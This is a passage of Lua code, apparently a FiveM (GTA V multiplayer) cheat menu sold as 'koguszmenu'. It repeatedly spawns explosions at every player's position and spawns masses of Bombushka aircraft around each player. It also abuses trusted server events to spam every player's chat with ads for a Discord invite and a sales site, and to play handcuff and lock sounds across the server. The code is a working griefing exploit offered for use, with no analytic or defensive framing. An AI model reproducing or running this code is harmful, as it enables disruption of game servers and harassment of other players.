					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					 AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					 AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					
	
	Citizen.Wait(100)



	
				
				cb = cb + 1
				if cb == 1 then

				break
				else
				for i = 0, 128 do
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
						Citizen.Wait(25)
								TriggerServerEvent('_chat:messageEntered', 'KoGuSzEk#3251', {0, 0x99, 255}, '/ koguszmenu! kup: https://discord.gg/86pueAu   | KoGuSzEk#3251 | https://www.sell-kogusz.pl')
				Citizen.Wait(25)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "lock", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "unlock", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "belt", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "lock", 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'handcuff', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'Cuff', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'cuffs', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'cuffseffect', 1.0)
				AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					 local dj = 'Avenger'
                        local dk = 'CARGOPLANE'
                        local dl = 'luxor'
                        local dm = 'maverick'
                        local dn = 'blimp2'
                        local dze = 'bombushka'
                        while not HasModelLoaded(GetHashKey(dk)) do
                            Citizen.Wait(0)
                            RequestModel(GetHashKey(dk))
                        end
                        while not HasModelLoaded(GetHashKey(dl)) do
                            Citizen.Wait(0)
                            RequestModel(GetHashKey(dl))
                        end
                        while not HasModelLoaded(GetHashKey(dj)) do
                            Citizen.Wait(0)
                            RequestModel(GetHashKey(dj))
                        end
                        while not HasModelLoaded(GetHashKey(dm)) do
                            Citizen.Wait(0)
                            RequestModel(GetHashKey(dm))
                        end
                        while not HasModelLoaded(GetHashKey(dn)) do
                            Citizen.Wait(0)
                            RequestModel(GetHashKey(dn))
                        end
                        while not HasModelLoaded(GetHashKey(dze)) do
                            Citizen.Wait(0)
                            RequestModel(GetHashKey(dze))
                        end
                        for i = 0, 128 do
                            for ak = 50, 100 do
                                local dl =
                                    CreateVehicle(GetHashKey(dze), GetEntityCoords(GetPlayerPed(i)) - ak, true, true) and
                                    CreateVehicle(GetHashKey(dze), GetEntityCoords(GetPlayerPed(i)) - ak, true, true) and
                                    CreateVehicle(GetHashKey(dze), 2 * GetEntityCoords(GetPlayerPed(i)) + ak, true, true) and
                                    CreateVehicle(GetHashKey(dze), GetEntityCoords(GetPlayerPed(i)) - ak, true, true) 


                            end
                        end
                    end
										TriggerServerEvent('_chat:messageEntered', 'KoGuSzEk#3251', {0, 0x99, 255}, ' koguszmenu! kup: https://discord.gg/86pueAu   | KoGuSzEk#3251 | https://www.sell-kogusz.pl')
										Citizen.Wait(25)
										TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "lock", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "unlock", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "belt", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "lock", 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'handcuff', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'Cuff', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'cuffs', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'cuffseffect', 1.0)
										AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
										TriggerServerEvent('_chat:messageEntered', 'KoGuSzEk#3251', {0, 0x99, 255}, '/twt koguszmenu! kup: https://discord.gg/86pueAu   | KoGuSzEk#3251 | https://www.sell-kogusz.pl')
										Citizen.Wait(25)
										TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "lock", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "unlock", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "belt", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "lock", 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'handcuff', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'Cuff', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'cuffs', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'cuffseffect', 1.0)
										AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
										TriggerServerEvent('_chat:messageEntered', 'KoGuSzEk#3251', {0, 0x99, 255}, '/dw koguszmenu! kup: https://discord.gg/86pueAu   | KoGuSzEk#3251 | https://www.sell-kogusz.pl')
										Citizen.Wait(25)
										TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "lock", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "unlock", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "belt", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "lock", 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'handcuff', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'Cuff', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'cuffs', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'cuffseffect', 1.0)
										AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
										TriggerServerEvent('_chat:messageEntered', 'KoGuSzEk#3251', {0, 0x99, 255}, '/darkweb koguszmenu! kup: https://discord.gg/86pueAu   | KoGuSzEk#3251 | https://www.sell-kogusz.pl')
										Citizen.Wait(25)
										TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "lock", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "unlock", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "belt", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "lock", 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'handcuff', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'Cuff', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'cuffs', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'cuffseffect', 1.0)
										AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
										TriggerServerEvent('_chat:messageEntered', 'KoGuSzEk#3251', {0, 0x99, 255}, '/tweet koguszmenu! kup: https://discord.gg/86pueAu   | KoGuSzEk#3251 | https://www.sell-kogusz.pl')
										Citizen.Wait(25)
										TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "lock", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "unlock", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "belt", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "lock", 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'handcuff', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'Cuff', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'cuffs', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'cuffseffect', 1.0)
										AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
                    AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, true)
					AddExplosion(GetEntityCoords(GetPlayerPed(i)), 5, 2.5, true, false, 2.5)
										TriggerServerEvent('_chat:messageEntered', 'KoGuSzEk#3251', {0, 0x99, 255}, '/t koguszmenu! kup: https://discord.gg/86pueAu   | KoGuSzEk#3251 | https://www.sell-kogusz.pl')
										Citizen.Wait(25)
										TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "lock", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "unlock", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "belt", 1.0)
				TriggerServerEvent("InteractSound_SV:PlayWithinDistance", 103232, "lock", 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'handcuff', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'Cuff', 1.0)
						TriggerServerEvent('InteractSound_SV:PlayWithinDistance', 10000, 'cuffs', 1.0)
